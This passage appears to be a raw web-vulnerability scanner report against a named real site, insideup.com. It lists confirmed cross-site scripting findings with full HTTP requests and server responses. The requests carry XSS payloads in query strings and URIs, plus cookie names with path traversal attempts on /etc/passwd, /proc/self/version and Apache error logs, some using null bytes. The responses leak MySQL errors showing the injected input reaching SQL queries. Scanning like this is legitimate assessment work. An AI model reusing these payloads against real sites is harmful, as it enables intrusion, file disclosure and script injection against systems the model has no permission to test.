OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:42 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=nas9u8dk8gd7kbcol4ichotvc6; path=/
Content-Length: 3033
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>' OR prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>' OR prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>' OR prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>' OR prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>' OR prj.project_page_url = 'leadflow/phsy00/?nsextt='"--></style></script><script>netsparker(0x00054C)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x00054C)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/wede00/

/ppc/leadflow/wede00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/wede00/?'"--></style></script><script>alert(0x000557)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x000557)</script>

Request

GET /ppc/leadflow/wede00/?'"--></style></script><script>netsparker(0x000557)</script> HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:46 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=o0v0volns4qvantbl87sib7nv5; path=/
Content-Length: 2963
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/?'"--></style></script><script>netsparker(0x000557)</script>' OR prj.project_page_url = 'leadflow/wede00/?'"--></style></script><script>netsparker(0x000557)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/?'"--></style></script><script>netsparker(0x000557)</script>' OR prj.project_page_url = 'leadflow/wede00/?'"--></style></script><script>netsparker(0x000557)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/?'"--></style></script><script>netsparker(0x000557)</script>' OR prj.project_page_url = 'leadflow/wede00/?'"--></style></script><script>netsparker(0x000557)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/?'"--></style></script><script>netsparker(0x000557)</script>' OR prj.project_page_url = 'leadflow/wede00/?'"--></style></script><script>netsparker(0x000557)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/?'"--></style></script><script>netsparker(0x000557)</script>' OR prj.project_page_url = 'leadflow/wede00/?'"--></style></script><script>netsparker(0x000557)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x000557)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/wede00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00055D)%3C/script%3E

/ppc/leadflow/wede00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00055D)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/wede00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3..

Parameters

Parameter Type Value
catId GET 20001
iusrc GET iupsc
URI-BASED Raw URI '"--></style></script><script>alert(0x00055D)</script>

Request

GET /ppc/leadflow/wede00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00055D)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:47 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=2u1fa85e55q6ak8kkh5i01mlg1; path=/
Content-Length: 3063
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php'"--></style></script><script>netsparker(0x00055D)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php'"--></style></script><script>netsparker(0x00055D)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php'"--></style></script><script>netsparker(0x00055D)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php'"--></style></script><script>netsparker(0x00055D)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php'"--></style></script><script>netsparker(0x00055D)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php'"--></style></script><script>netsparker(0x00055D)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php'"--></style></script><script>netsparker(0x00055D)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php'"--></style></script><script>netsparker(0x00055D)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php'"--></style></script><script>netsparker(0x00055D)</script>' OR prj.project_page_url = 'leadflow/wede00/project.php'"--></style></script><script>netsparker(0x00055D)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x00055D)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/

/ppc/leadflow/ CONFIRMED

http://www.insideup.com/ppc/leadflow/?'"--></style></script><script>alert(0x000559)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x000559)</script>

Request

GET /ppc/leadflow/?'"--></style></script><script>netsparker(0x000559)</script> HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 